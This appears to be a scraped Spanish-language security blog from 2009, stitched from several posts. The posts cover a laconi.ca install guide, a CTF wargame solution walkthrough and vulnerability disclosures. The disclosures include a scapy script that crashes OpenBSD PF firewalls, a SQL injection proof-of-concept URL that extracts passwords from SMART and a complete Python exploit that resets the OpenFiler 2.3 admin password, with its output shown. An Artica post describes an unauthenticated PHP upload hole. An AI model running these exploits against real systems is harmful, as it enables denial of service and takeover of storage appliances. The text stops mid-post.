Despues de ese analisis me quedan muchas dudas, me queda la duda de que pasa con todas las implementaciones de PF en otros Sistemas Operativos, por ejemplo FreeBSD, NetBSD, DragonFly y las distribuciones basadas en estos, por ejemplo el Firewall PFsense o el mismo ComixWall. Porque en los arboles CVS oficiales de estos proyectos no hay cambios?, porque si NetBSD tiene como último import el sistema BASE 4_4 de OpenBSD no ha parchado el PF?
Etc, etc.

Es posible que cualquier implementación de firewall basada en PF sea vulnerable, entonces hice un chequeo de los workarounds recomendados por los desarrolladores y SI funcionan (o que esperaban?) entonces mientras sale un parche para lo que sea que este usando, modifique sus reglas para que usen explicitamente el inet o el inet6, de esa forma no será vulnerable.

A continuación el código para crashear un OpenBSD con reglas nat o rdr básicas:

bash-3.2# cat exploit_pf.py
import sys
from scapy import *
victim=sys.argv[1]
icmpv6=58
p=IP(dst=victim)
p.proto=icmpv6
sr(p,timeout=1)
bash-3.2#

Esto lo que hace es enviar un paquete al host victima, obviamente OpenBSD debe estar en la mitad. Para mas información lea sobre scapy o impacket y lea el reporte de seguridad.

Las reglas que usé para testear desde adentro y desde afuera son:

externa="rl0"
interna="sis0"

nat log on $externa from !{$externa} to any -> ($externa)
rdr log on $externa from any to any -> 172.16.20.2

Donde 172.16.20.2 es el host destino para el envío del paquete, osea el que esta dentro de la LAN. Con las dos reglas el openBSD hace crash, sea desde la LAN --> WAN o desde la WAN --> LAN.

La forma de evitar este ataque es parchando el PF y recompilando el núcleo o con el workaround:

externa="rl0"
interna="sis0"

nat log on $externa inet proto {icmp tcp udp} from !{$externa} to any -> ($externa)
rdr log on $externa inet proto {icmp tcp udp} from any to any -> 172.16.20.2

bueno eso es todo, despues seguimos charlando ...

AAAgggrrr!!!

Update: respondio un usuario de la lista misc@, la solucion suya fue modificando el codigo de ping.c.

About Packet Filter

2009-03-31T19:13:00.010-05:00

Los amigos de OpenBSDColombia han creado un par de manuales muy instructivos acerca de como usar PacketFilter para crear un firewall en el sistema operativo OpenBSD.

Le agradezco a esta comunidad por permitirme tener la primicia de la noticia.

RIP 2 on OpenBSD 4.4

2009-03-15T19:24:00.004-05:00

Los amigos de OpenBSD han generado un nuevo manual sobre como configurar OpenBSD como un enrutador RIP 2, si quieren leer mas sobre el tema, bajen el documento:

http://groups.google.com.co/group/OpenBSD-Colombia/files

Interesting sites

2009-02-17T22:54:00.023-05:00

Estos sitios me parecieron interesantes, sin embargo aveces se producen errores al intentar entrar, aún no se porque. Si tienes suerte espero que te funcionen.

(actualizado permanentemente)

http://mail.colombiaaprende.edu.co:8080/aplicaciones/global/cerrar_cookies_jsp.asp

Installing a microblogging server (laconi.ca)

2009-02-09T11:25:00.012-05:00

Hoy en dia un medio de comunicación muy eficiente que se ha popularizado es el uso de los microblogs o sistemas donde se pueden hacer microposts (<= 160 caracteres). Identi.ca es la muestra de este servicio en funcionamiento, y la relación con laconi.ca es que usa su software para funcionar. Entre otros servicios populares esta por ejemplo twitter.com.

Que es Laconi.ca entonces?

Laconi.ca es un servidor de microblogging opensource que permite instalar este servicio en nuestra Intranet para lo que sea que lo necesitemos. Los siguientes pasos nos muestran como instalarlo de una forma sencilla:

Paso 1

Visitar el sitio de laconica y buscar la versión mas reciente:

Paso 2

Descargamos el archivo de fuentes, lo descomprimimos, lo copiamos en el directorio raiz del servidor web, le ponemos permisos para el usuario que corre el servicio web y le damos permisos de escritura al directorio avatar (de lo contrario tendremos problemas de escritura cuando cambiemos la imagen del perfil.)

Tambien creamos la base de datos (MySQL) a usar con laconica , la poblamos y creamos el usuario con el que se accedera a la BD, *por favor cambie el ejemplo*. Estos pasos no son tan dificiles, solo sigan los comandos que verán en las imagenes:

Paso 3

Vamos a configurar el servicio, para eso renombramos el archivo de configuración config.php.sample:

profes:/var/www/microblog# mv config.php.sample config.php

Y en este mismo archivo modificamos las siguientes variables (con estas es suficiente, luego puede experimentar a cambiar otras cosas)

$config['site']['name'] = 'SITIO DE PRUEBA';

Titulo para el sistema de microblogging

$config['site']['server'] = '192.168.20.18';

Dirección IP del sitio, si esta usando un servidor DNS puede configurar el nombre del sitio (ej: www.empresa.com).

$config['site']['path'] = 'blog';

Ruta donde estará instalado el sistema de blogging, para este ejemplo quedara en: http://192.168.20.18/blog/

$config['db']['database'] = 'mysql://usuario:password@localhost/laconica';

Configuración del acceso a la BD, en su orden estan: usuario, clave, servidor mysql y base de datos.

$config['db']['type'] = 'mysql';

Tipo de bases de datos, para el ejemplo y que es lo mas comun, usamos MySQL.

Paso 4

Ahora hacemos las pruebas básicas, entramos al sitio y lo observamos un poco, debe lucir algo parecido al de la imagen:

Luego intentamos registrar un nuevo usuario:

Vemos que la creación del usuario es satisfactoria:

En la última imagen podemos ver en el ovalo verde que el usuario fue creado con exito, de esa misma forma todos los usuarios que vayan a usar nuestro sistema se pueden registrar, sin embargo en el ovalo rojo podemos ver que las direcciones (las URL), son un poco largas y algo complejas de recordar, para eso se incorpora una caracteristica dentro de laconica para hacer que las URL sean mas cortas y mas vistosas, la opción en cuestion esta en el archivo config.php y se llama:

$config['site']['fancy'] = true;

Debemos poner la variable a "true" para que pueda funcionar, pero aún hace falta configurar algo en el servidor web, pues es este último el que hace el truco de reescribir las URLs.

Paso 5

Arreglamos los detalles en el el servidor apache, para esto tomamos como base el archivo htaccess.sample.

nando:/var/www/blog# ls -la htaccess.sample
-rw-rw-r-- 1 www-data www-data 11576 feb 6 15:35 htaccess.sample nando:/var/www/blog#

Si visualizamos el archivo, encontramos algo como:

RewriteEngine On

# NOTE: change this to your actual Laconica path; may be "/".

RewriteBase /mublog/

RewriteRule ^$ index.php?action=public [L,QSA]
RewriteRule ^rss$ index.php?action=publicrss [L,QSA]
RewriteRule ^xrds$ index.php?action=publicxrds [L,QSA]
RewriteRule ^featuredrss$ index.php?action=featuredrss [L,QSA]
RewriteRule ^favoritedrss$ index.php?action=favoritedrss [L,QSA]
RewriteRule ^opensearch/people$ index.php?action=opensearch&type=people [L,QSA]
...

La manera de configurarlo entonces es crear un nuevo archivo que contenga la configuración adicional que necesitamos:

nando:/var/www/blog# pico /etc/apache2/conf.d/laconica

Y dentro de este archivo creamos una directiva de directorio (Directory) y allí pondremos todo el contenido del archivo htaccess. Entonces quedaria algo asi:

Directory /var/www/blog
RewriteEngine On
RewriteBase /blog/
# NOTE: change this to your actual Laconica path; may be "/".

RewriteRule ^$ index.php?action=public [L,QSA]
RewriteRule ^rss$ index.php?action=publicrss [L,QSA]
RewriteRule ^xrds$ index.php?action=publicxrds [L,QSA]
RewriteRule ^featuredrss$ index.php?action=featuredrss [L,QSA]
...
/Directory

Observe que la directiva de Directorio debe apuntar al directorio real donde esta instalado laconica y el parametro RewriteBase debe apuntar al PATH del url definido en el archivo config.php, de lo contrario no funcionará.

Ahora solo falta habilitar el módulo de rewrite, que en Debian no esta by default. Eso lo hacemos así:

nando:/etc/apache2/mods-enabled# pwd
/etc/apache2/mods-enabled
nando:/etc/apache2/mods-enabled#
nando:/etc/apache2/mods-enabled# ln -s ../mods-available/rewrite.load .
nando:/etc/apache2/mods-enabled# /etc/init.d/apache2 restart
Restarting web server: apache2.
nando:/etc/apache2/mods-enabled#

Listo eso es todo (toma 10 minutos la configuración completa), despues de recargar podremos entrar nuevamente al sitio y comprobar que las URL ya aparecen de forma corta y mas fáciles de recordar, si queremos darle una apariencia diferente solo es editar el config.php y cambiar la variable:

$config['site']['theme'] = 'identica';

That's all folks, cualquier duda en los comentarios.

OFF TOPIC

2009-02-08T22:56:00.005-05:00

http://www.dosisdiarias.com/

How to pass the "JSL 2008 Colombian Wargame"

2009-02-05T21:21:00.050-05:00

RETO INFORMÁTICO JSL 2008

Hace algunos días publiqué una invitación para participar en un reto informático (a.k.a wargame) relacionado con herramientas libres y la comunidad de software libre colombiana, hubo buena acogida por parte de los "linuxeros" y aproximadamente jugaron 45 personas. De esas 45 personas 13 se mantuvieron constantes y antes de bajar el juego (1 mes después) ya teníamos un ganador.

En este post quiero hacer un resumen/solución del reto para los que no pudieron pasar del primer nivel y para los que no entendieron algunos de los niveles. Esperemos que para las JSL 2009 podamos organizar un mejor juego, para que todos puedan participar durante el evento.

El reto tenia preguntas (xa) que se resolvían desde la web (las fáciles) y para otras (xb) era necesario loguearse en un sistema Debian Linux y analizar las pistas y los archivos en los homes de los respectivos usuarios (las medianamente complicadas). El acceso se hacia por SSH y las credenciales de acceso se daban a medida que se avanzaba en el juego.

Bueno, hablemos de las soluciones:

NIVEL 1a - LOS AUSENTES

La respuesta a este nivel es muy sencilla, solo es ubicar a los personajes de la fotografía (tomada en las JSL 2007) e investigar sus nicks. Este reto se podía resolver buscando en los facebooks, en los blogs, comentarios en las fotos o tags en cualquier otro lugar donde se publiquen fotos.
También preguntando en la lista de colibrí o inclusive preguntándome a mi por esos señores.

Los personajes son: cybux, kleper y ederaam, 3 miembros de la comunidad de SL residentes en Medellín. Luego solo era hacer las variaciones posibles para encontrar la clave.

NIVEL 1b - EL ALIAS

Una vez logueado en el sistema con el usuario que aparece en este nivel, encontramos un archivos de pistas:

1. El nombre del alias de la conexion
2. Conexion = Interfaz 3. DNS local

Estas pistas para muchos fueron bastantes confusas, para otros también ;)
Para resolver este nivel debíamos pensar las pistas en orden.

El alias de una conexión es conocida como una interfase virtual, en linux se pueden crear con el comando:

#ifconfig eth0:0 x.x.x.x up

Suponiendo que eth0 es la interfaz principal. Cuando se usa el comando "ifconfig" se observa esta nueva interfaz también.

Conexión es igual a interfaz, aplica para la pista 1.

El DNS local en un sistema unix, es la forma como el resolver puede traducir nombres a direcciones IP, normalmente primero buscará en el archivo /etc/hosts y luego le preguntará a un servidor DNS matriculado en /etc/resolv.conf.

La respuesta estaba en el archivo /etc/hosts, y la pista era buscar el nombre que tuviera asociado la interfaz virtual (alias) de la interfaz principal.

Eso era todo.

NIVEL 2a - ANTISPAM

Cuando hablan de nuestro wiki, hablan del wiki principal de la comunidad colombiana de software libre , una vez allí se debe analizar que el sistema que se implementa es el archi reconocido MoinMoin, el cual en sus versiones mas recientes tiene unas caracteristicas de antispam. El sistema antispam del wiki consiste en que cada vez que un usuario quiere hacer una entrada, se le hará una pregunta y si la respuesta es correcta se asume que el que contesto es un humano y no es un spambot o algo similar tratando de llenar el wiki de tonterías.
Como las preguntas no son infinitas entonces la idea es hacer unas cuantas pruebas de escritura y verificar las preguntas que salen, en poco tiempo te darás cuenta que hay algunas que aparecen mas veces. la respuesta al reto es una de esas respuestas que se repite con regularidad.

NIVEL 2b - ENCUENTRALO

La pista de este nivel es: "El que busca encuentra", adicional a esto hay un archivo nivel2.jsl (lo puedes descargar en la sección de archivos).
La forma de solucionarlo es primero verificar de que archivo se trata, luego intentar leerlo y nos damos cuenta que es un archivo con el formato del software inkscape, por lo tanto nuestra solución puede ser:

1. Abrir el archivo con el programa inkscape

y luego tratar de limpiar todo lo que no nos sirve, eliminar recuadros, poner la vista solo en contornos, organizar las letras, etc. Hasta que encontremos un recuadro donde esta la frase que contiene la clave.

2.Hacer búsquedas aleatorias tratando de hallar la clave (así como se ve en la imagen)

Podemos usar el comando grep para buscar la palabra "clave", de esta forma se resuelve el ejercicio mas rápido.

NIVEL 3a - LISTA DE CORREOS

La solución a este nivel es más fácil de lo que todos creían. Algunos lo resolvieron a fuerza bruta, tratando de adivinar cuantos mensajes había en la lista en ese mes, otros simplemente buscaron el historial de la lista y ubicaron el mes de Julio:

http://listas.el-directorio.org/pipermail/colibri/2008-July/date.html

Ahí mismo aparece la respuesta.

NIVEL 3b - DISPOSITIVOS DE ENTRADA

El nivel 3 de este wargame nos pide encontrar una clave y como pista nos hablan de los dispositivos de entrada, además nos mencionan las X. Como todos sabemos las X en los sistemas Unix representan la interfaz gráfica, por lo tanto pensamos que los dispositivos de entrada son el mouse y el teclado.

Del xorg.conf:

Section "InputDevice"
Identifier "Generic Keyboard"
Driver "cla"
Option "CoreKeyboard"
Option "XkbRules" "xorg"
Option "XkbModel" "pc104"
Option "XkbLayout" "us"
EndSection

Section "InputDevice"
Identifier "Configured Mouse"
Driver "ve"
Option "CorePointer"
Option "Device" "/dev/input/mice"
Option "Protocol" "ImPS/2"
Option "Emulate3Buttons" "true"
EndSection

Si vamos a la sección adecuada en el archivo de configuración: /etc/X11/xorg.conf podemos encontrar muy fácilmente las pistas necesarias para hayar la clave.

NIVEL 4a - RETO GEEK

Esta pregunta requiere un poco de observación, por eso las gafas (lentes) en la imagen.
Nos están hablando de un reto geek, y nos aclaran que no es este reto de las JSL, entonces cual era?. La solución era buscar en google, o recordar un proyecto que iniciaron algunas personas de la comunidad hace algún tiempo, el personaje de la caricatura tiene unas gafas tipo nerd y el sitio web tiene un "reto geek". Para los que todavía no dan con el chiste, se trata de www.cibertito.com, visitenlo y prueben el reto.

NIVEL 4b - COORDENADAS

Para resolver este nivel hace falta un poco de imaginación, pero la verdad es bastante simple.
Una vez ingreses al sistemas con las credenciales asignadas, veras una pista que dice:

1. Coordenadas de la proxima clave: 707, 7

Desde ahi se puede deducir que o hace parte de unas coordenadas o son permisos al estilo Unix (rwx-rwx-rwx). Si observamos los permisos del archivo que aparece en el home (nivel4.jsl) nos damos cuenta que solo tenemos permisos para leer el archivo desde root.

Entonces que hacemos?

Intentamos visualizar el archivo con cat, more, less y todos nos sacan un error de permisos (NO tenemos permisos para leerlo), pero que tal si probamos con los comandos cut, tail y head?

con el comando head podemos visualizar algo y encontramos un archivo con el siguiente formato:

...
Linuxant:Linuxbar:LinuxCol:Linux En-Caja:LIUDECX:Lix S.G.:Lugula:Minka-Ecci
Merlinux:Mono Colombia:NEBLINUX:OpenBSD Colombia:PIX-UDEC:PLUG:POLUX:POLLUX
PUJCLUE:PULPA:Python Colombia:Slackware Colombia:SLEC:Slow:Sl-prog:SLUMB
TESIS:UNALIX:Ubuntu Colombian Team:USB-Linux:Vultur:XUE-LINUX:Slibant
join:us:now:and:share:the:software:you:free:share:Abacux
ACLibre:Altred:ANIMAZIONE:Arca-csl:AsOfT-ExNeT:BogJBug:CAFEBUG:
CaliLUG:Calix:Camayihi:CETISOFT:CINS (SENA):ChampeTUX:Cununo:CUSOL-UIS
...

El archivo contiene un listado de los grupos de S.L. del país que se repite una y otra vez. Si bien esto no nos sirve de nada, podemos recordar que el movimiento de S.L. sigue vigente en Colombia (esta lista fue sacada del sitio: el-directorio.org).

Que tal si ese 707, 7 son unas coordenadas para el archivo?, las lineas del archivo estan separadas por el caracter ":", entonces contemos 707 lineas y 7 campos separados con ":".

nando$ ls
m.sql nivel4.jsl nivel4.jsl.save pista.txt
nando$ file nivel4.jsl
nivel4.jsl: ASCII text
nando$ head -707 nivel4.jsl | tail -1 | cut -f7 -d:
kratux
nando$

He ahí la respuesta :p

NIVEL 5a - PINGUINOS

Esta pregunta es una de las más fáciles, nos muestran una imagen de un pinguino, que hace parte del logo del grupo CUSOL, si analizamos la pregunta, podemos pensar que estan hablando de ese pinguino. Y buscando un poco acerca de pinguinos (diferentes a TUX), encontramos que ese es un pinguino emperador.

NIVEL 5b - ADIVINANDO?

Para resolver este nivel le prestamos atención a la pregunta que se hace en la pista:

1. Adivinando?

Como siempre verificamos el archivo que esta en el home y nos damos cuenta que es un script en python pero compilado, asi que no tenemos el código fuente directamente. Intentamos ejecutarlo y observar el funcionamiento, al parecer debemos adivinar una secuencia de numeros para poder pasar el reto.

Si intentamos un poco de reversing básico, usando el comando "strings", no vemos nada raro, entonces que hacemos?

Este nivel se puede solucionar de varias formas, dos de ellas son:

1. Intentar adivinar la secuencia (ensayo y error), esta técnica funciona cuando los algoritmos son simples o cuando se tuvo un error en la programación, que lo hace vulnerable en la generación de la secuencia. (este fue el caso del ejercicio)

2. Usar un decompilador de python, lo que requiere un poco mas de conocimiento o si tenemos la suerte que el archivo pese menos de 5KB, podemos ayudarnos del servicio devpython y obtener algo así:

decompile /tmp/upload/20090208185201_757.pyo...
#! /usr/bin/env python
# emacs-mode: -*- python-*-
# -*- coding: utf-8 -*-

import random
o = 'r'
jka = 'e'
pl = 'goc'
koolpl = 'CINS'
poa = 'clavemaster'
pla = 'UT4'
baaa = 'UrbanTerror'
qq = '0rp'
try:
a = int(raw_input('Ingrese un numero: '))
for valor in [1,
2,
3,
4,
5,
6,
7,
8,
9]:
print ((((a * 7) - (a - 3)) + pow(a, 2)) + valor)
a = (a + 2)

respuesta = ((((a * 7) - (a - 3)) + pow(a, 2)) + 10)
entrada = int(raw_input('Cual es el siguiente: '))
if (entrada == respuesta):
clave = (((o + jka) + pl) + qq)
print ('Affirmative!, la clave es: %s' % clave)
else:
print 'Negative!'
except:
mensaje = random.randint(1, 6)
if (mensaje == 1):
print "Double time, let's move!"
elif (mensaje == 2):
print 'Go for the objective.'
elif (mensaje == 3):
print 'Stick with me.'
elif (mensaje == 4):
print 'Hold your position.'
elif (mensaje == 5):
print 'I need a medic!'
elif (mensaje == 6):
print 'Where are the medics'

# local variables:
# tab-width: 4
depythoned 1 files: 1 okay, 0 failed

Siguiendo el código fuente es mas fácil saber que es lo que hace y cual es la respuesta ;)

NIVEL 6a - INVITADO ESPECIAL

Leyendo la programación de las JSL 2008, nos damos cuenta que habia un invitado especial, la respuesta era casi obvia ;)

NIVEL 6b - INGENIERIA INVERSA?

La pista de este nivel es otra pregunta:

1. Ingenieria Inversa?

Es posible que muchos hayan afrontado el problema tratando de reversar el archivo nivel6.jsl, sin embargo haciendo un analisis mínimo sobre el tipo de archivo (comando file), nos dabamos cuenta que era un archivo de audio codificado en OGG, por lo tanto lo de "inversa" era una pista.

Entonces nuestro pensar seria usar una herramienta libre que nos permitiera reproducir ogg y en caso de que lo necesitaramos podriamos editar el audio. Que tal audacity?

Analizando un poco el audio notamos que la velocidad del audio esta acelerada y que ademas el audio esta invertido, es muy fácil usar un par de funciones del audacity para arreglarlo y luego podremos escuchar la canción del software libre interpretada por Richard Stallman con una pequeña modificación. Esa modificación es la clave que se esta buscando para el nivel.

Pd: Hay que tener buen oido para entenderla ;)

NIVEL 7a - El nick

Se necesitan mas pistas para adivinar este reto?, en la entrada del wargame cada vez que se logueaban aparecia un mensaje diciendo que nonroot y duma habian creado el reto, osea que este nivel se superaba en menos de 3 intentos ;)

NIVEL 7b - Quien es quien es?

En el archivo relacionado con este nivel, encontrabamos el siguiente texto:

Pqebgée pq qefgpumd xm radym qz cgq mofgó Xuzge k tmnqd radygxmpa gzm fqadím pqx bad cgé fgha éjufa, fayé xm pqoueuóz oazeouqzfq pq bdanmdxm qz yu zgqha bdakqofa (qx ogmx, pqna mpyufudxa, qe ygota yqzae oaybxqva k mynuouaea).

Xa bduyqda cgq tuoq rgq dqadsmzulmd k euybxuruomd baboxuqzf. Qx fdmnmva pq Omdx Tmddue qdm ygk ngqza, bqda qjtuním gzm oaybxqvupmp uzzqoqemdum, fíbuom pq ygotae pq xae bdasdmympadqe qz O. Éx fdmfmnm qx oópusa oaya xm bmdfq oqzfdmx k xme qefdgofgdme pq pmfae oaya gz mbaka bmdm éefq. Oaya dqegxfmpa, qx oópusa dqegxfó ygk qxqsmzfq, bqda qx pueqña pq xme qefdgofgdme pq pmfae emxuó mp tao k rqa (bad xa yqzae oaz dqebqofa m xae qefázpmdqe qjusqzfqe pq qefq huqva tmowqd pq Xueb).

Cuando vemos algo así, inmediatamente pensamos en criptografia o algun tipo de codificación para esconder el texto real. La verdad este mecanismo de cifrado no es muy complicado y se puede resolver fácilmente con el uso de herramientas como cryptool o con alguna herramienta para consola instalable para linux, BSD, etc.

El cifrado usado especificamente para este nivel es el del Cesar, una vez descifrado el texto leeras un par de parrafos de un texto muy común en el mundo del software libre. Te daras cuenta que hacen parte del ensayo: La catedral y el Bazar , si aún no lo has leido, que esperas?

Como la pregunta de la pista dice quien es, quien es?, se supone que hace referencia a alguien, precisamente el personaje que escribio este ensayo. Esa es la respuesta ;)

Pd: si te gustó el tema de criptografia, un estudiante del SENA MEDELLÍN, creó un algoritmo de cifrado sencillo, porque no intentas el reto?

NIVEL 8a - JUAAAAA

Este nivel es bueno, consiste en adivinar una clave teniendo como unica pista una risotada de los amigos Calvin y Hobbes, realmente estos personajes no son el punto en cuestión, encambio si la risa de ambos. Como se expresa una risa incontenible en un chat, en un foro, en cualquier otro mecanismo de comunicación de Internet ?(no es oficial, es la jerga de Internet)

LOL: acrónimo de "Laughing Out Loud", también "Lot Of Laughs", risa ruidosa o carcajada.

LOL

NIVEL 8b - SISTEMAS DE ARCHIVOS

La pista de este nivel nos habla de sistemas de archivos, puntos de montaje y etc. La forma de resolverlo es buscar que particiones estan disponibles en el sistema, de esa forma veremos algunas particiones que no estan montadas en el sistema, entonces las montamos y luego verificamos que hay en ellas. allí vamos a encontrar muchos archivos y directorios, si podemos hacer una busqueda por todos estos archivos buscando la palabra "clave", encontraremos un archivo que tiene la respuesta. Otra posibilidad era abrir archivo por archivo y buscar la clave o programar un script en cualquier lenguaje, tal como perl, php o python para que realizara esta busqueda por nosotros.

NIVEL 9a - CORREO LINUXERO

Este nivel es para los mas viejitos, los que crearon cuentas alguna vez en rocketmail, mixmail y porsupuesto: linuxmail.org.

Pd: sera que ya estamos muy viejos?

NIVEL 9b - ADIVINANDO?

Las pistas de este nivel son algo confusas, pero son aproposito.

1. Juego BSDero/Linuxero/Geek para consola con nombre de malware
2. "101" veces la cabeza del protagonista
3. Cuanto pesa sin espacio?

A primera vista no tienen relación, no tiene sentido, pero analicemos.

Que es un malware?, ahora que has leido has encontrado cosas como: trojan horse, virus, worms, logic bombs, etc. Bueno, la primera pista dice que el juego tiene nombre de malware, osea que se debe llamar como esos que acabamos de mencionar.

!WORM!

La segunda pista dice "101" veces la cabeza del protagonista. Si observamos la cabeza del protagonista en consola veremos que es una @, 101 en binario es el 5, por lo tanto estamos diciendo algo como 5 @, pero la tercera pista dice que sin espacios, que cuanto pesa?
La respuesta es que pesa 5 arrobas ;)

NIVEL 10a - EL JEROGLIFICO

Es muy simple de resolver este nivel, solo es descifrar el jeroglifico.

Por ahi en la wikipedia dice algo acerca de Francisco Jose de Caldas.

"Cuando bajaba las escalinatas de la Universidad del Rosario, en camino hacia el patíbulo, dibujó en una pared la letra griega θ, enigma que tradicionalmente
se ha interpretado como Oh, larga y negra partida ..."

Quien lo adivinó?, si adivinabamos el jeroglifo, buscabamos el autor de esa frase, y el primer apellido del mismo era caldas, justamente la clave para pasar el nivel.

NIVEL 10b - EL FINAL

Este nivel tenia un poco de dificultad, pero solo porque estamos acostumbrados a pensar en un sentido. Las pistas del nivel eran:

1. http://201.232.43.71:3002/theend.php
2. piensa al reves

El script en PHP devolvia un error:

A primera vista lo que sucede es que el script no puede acceder a la base de datos, puede ser que tenga el usuario o la clave incorrecta, asi que lo primero que intentamos es entrar al código fuente del script, pero desafortunadamete esta ofuscado y no entendemos nada de nada.
Que hacemos?

Aqui es donde todos enloquecieron, como hacemos para saber como nos conectamos a la base de datos, si no podemos entrar al script en php? ...

La segunda pista es la clave del asunto, nos dice: "piensa al reves", pensar al reves en este tipo de juegos significa enfocar el problema diferente, quizas no es que tengamos que modificar el script para que acceda como queremos, quizas lo que tenemos que hacer es organizarle todo para que no produzca error.

Finalmente entendemos ese concepto de pensar al reves y lo que hacemos es ir a la BD (MySQL), pero como entramos?, cual es el usuario y la clave?, esta es la parte fácil, pues la clave para el usuario root es root.

Lo que nos encontramos cuando entramos es que ni la BD, ni las tablas que solicita el script existen, entonces que hacemos?. Nuevamente pensamos al reves y lo que hacemos es ponerle un password que posiblemente este usando el script y luego creamos la base de datos que esta buscando y vamos verificando que los errores cambian y nos vamos acercando a la respuesta.

Y asi continuamos creando todo lo que suponemos que el script necesita hasta que nos da la contraseña del último nivel. Bonito no?

Aunque hubo un ganador en el wargame, realmente se que no pasaron todos los niveles de la forma que se esperaba, son cosas que debemos mejorar ;). Por ejemplo si usabamos la misma BD para almacenar las respuesta es obvio que la mas fácil seria buscar la tabla de respuestas y olvidarse de pensar al reves.

Tambien algunos intentaron desofuscar el script, pero esto es una tarea realmente ardua, solo para reversers (a.k.a crackers).

PALABRAS FINALES

Gracias a todos los que se tomaron la molestia en jugar, yo se que este tipo de juegos no es muy conocido en Colombia, pero iniciar con algo ya es algo. ;)

Hubo un ganador, que termino a media noche y me envio un SMS a despertarme porque habia pasado el reto, felicitaciones para Él.

Agradezco a la empresa ServiUnix.com por prestarme la conectividad y el servidor para implementar el reto durante el mes que estuvo al aire, esperemos que en un futuro haya mas colaboración por parte de la comunidad para los retos organizados durante los eventos

Gracias a los compañeros wilmaron y duma por colaborar con la realización del reto, recuerden que la plataforma donde lo montamos es la misma en la que se viene trabajando desde el 2007, es software libre y se puede usar en lo que quieran.

Y finalmente gracias a los lamers que intentaron hacerle D.O.S al servidor varias veces, que ejecutaron exploits, hicieron forks() infinitos y todas esas niñerias que finalmente nos ayudaron a organizar mejor la seguridad de la plataforma. ;)

Eso es todo, cualquier duda sobre las respuestas en los comentarios, recuerden que tambien pueden descargar todos los archivos nivelx.jsl para hacer pruebas. Byte all.

Pd: No pense que me fuera a quitar tanto tiempo hacer este solucionario ...

Bug for SMART (conformix ) v. 3.0.3 (current)

2009-02-04T14:59:00.005-05:00

Smart es un software que ayuda a hacerle el seguimiento a los procesos de gestión relacionados con seguridad informática.
Mirando el código encontre varias cosas, solo pongo un ejemplo para que ustedes mismos investiguen un poco mas.

El bug es un tipico SQL injection, tambien hay otros bugs sencillos como XSS y errores en los scripts que me indican donde estan instalados.
Un ejemplo de SQL injection (PoC):

En el archivo: downloadlibraryfile.php

Ejemplo:
http://smarthost/downloadlibraryfile.php?fileId='2' AND 0
UNION SELECT password,password,password,password FROM user

Otros archivos posiblemente vulnerables:
* firewallrequest.php
* firewallrequestprocessing.php
puedo inyectar variables en
$srcIP=$_POST['srcIP'];
$dstIP=$_POST['dstIP'];
$srcNAT=$_POST['srcNAT'];
$dstNAT=$_POST['dstNAT'];
$port=$_POST['port'];
$protocol=$_POST['protocol'];
$justification=$_POST['justification'];
$firstname=$_POST['firstname'];

Como siempre, si estas usando esta versión entonces parcha el software.
Saludos.

Bug and exploit for OpenFiler 2.3

2009-02-03T15:46:00.005-05:00

Todos saben lo que es un NAS y saben que pueden almacenar mucha información critica para una compañia, como los respaldos de las estaciones y almacenar BDs y etc. Que pasaria si alguien no autorizado pudiera convertirse en el administrador de su appliance NAS?

Los amigos de OpenFiler nunca contestaron, por eso publico esto aqui:

********************************************************************************************
********************************************************************************************

Software:

Distro Release: Openfiler NAS/SAN Appliance 2.3
GUI Version: r1563-2-1

(http://www.openfiler.com/)

Openfiler takes the pain out of deploying and managing networked storage. You bring the hardware, any industry standard server will do, combine it with our Openfiler software and the result is a powerful networked storage solution that exports your data via a full suite of industry standard storage networking protocols. Openfiler lowers deployment and maintenance costs for networked storage without compromising functionality or performance.

Author: just a nonroot user

Vuln Type: register globals or something like that

Date: 2 weeks ago, not answer from devs.

********************************************************************************************
********************************************************************************************

in:

[root@nas account]# pwd
/opt/openfiler/var/www/htdocs/account/password.html
[root@nas account]#

10 require("pre.inc");
11
12
13 if ($GLOBALS["userauthenticated"] == 0)
14 {
15 generic_header(array("title" => _("Your account")));
16 dual_begin(array());

you can set userauthenticated via GET, then you know.

and ...

93
97 form action="password.html" method="post"
98 ...

You can set the variables in the form.

then you can set the "openfiler" password to anything that you like.

**********************************************************

You can exploit this with something like (PoC):

1 # Coded by http://nonroot.blogspot.com/
2 import urllib,sys,re
3 #host example: https://192.168.20.5:446/
4 host=raw_input("OpenFiler system ( include http and /): ")
5 #Super admin user
6 user='openfiler'
7 #What pass do you want?
8 password='nonroot'
9 #use it please ;)
10 fake="myladyastridcita"
11 data= urllib.urlencode({'current_password':fake , 'passcookie': fake, 'usercookie': user,'new_password': password,'confirm_new_pas sword': password,'userauthenticated':"666"})
12 response= urllib.urlopen(host+"account/password.html", data)
13 data=response.read()
14 print data
15 lookup=re.compile("successfully").search
16 match=lookup(data)
17 if match:
18 print "Ok, now go and login with user:", user, " and password: ", password, " in ",host
19 else:
20 print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"
21 sys.exit(2)
22 sys.exit(0)

**********************************************************
http://www.milw0rm.com/exploits/7972

use it:

nando:/home/nando# python exp_103_openfiler.py
OpenFiler system ( include http and /): https://192.168.20.5:446/
Ok, now go and login with user: openfiler and password: nonroot in https://192.168.20.5:446/
nando:/home/nando#

That's all

I have the reason (Artica case)

2008-10-17T21:20:00.008-05:00

Esta entrada en el blog tiene dos motivos:

1. Recordarme que aveces me da por alegar por pura terquedad.

2. Que cuando se reporta un bug hay de respuestas a respuestas, esta me parecio muy divertida.

El caso es que en la empresa estamos trabajando con una solución llamada artica, la cúal entre muchas cosas integra un sistema de correo con todos los juguetes.

Bueno, el caso es que me puse a mirar un poco los archivos del software y me encontre con uno muy especial llamado: upload.php.

Paso 1. Abra la URL con el script (no necesita auth en el artica)

Paso 2. Cargue un script que haga lo que usted quiera (PHP)

Paso 3. Disfrute

Cuando lo abrí me di cuenta que precisamente era eso, un uploader, lo malo del asunto es que permitia subir archivos a la plataforma y lo segundo mas malo es que en ningun lado se hablaba de el. Como un adulto responsable le escribí al desarrollador principal de artica y para no postear los emails, resumo lo sucedido:

yo:
Que tal dev, me parece que este archivo no deberia estar aqui, se les olvido quitarlo o es un bug?, me podrias confirmar? (siempre pido una confirmación para no sentirme tan loco).

dev:
Querido amigo, te cuento que eso es un archivo viejo que usaba para hacer pruebas, no te preocupes borralo y todo estará bien.

yo:
Hola!, si, yo se que si lo elimino todo estará bien, pero que pasa con las otras personas que no lo han visto?, existe algun archivo README, INSTALL donde lo mencionen?

dev:
NO, no se preocupe, eso ya desaparecio en versiones anteriores, relajese, tomese un tinto, no es para tanto.

yo:
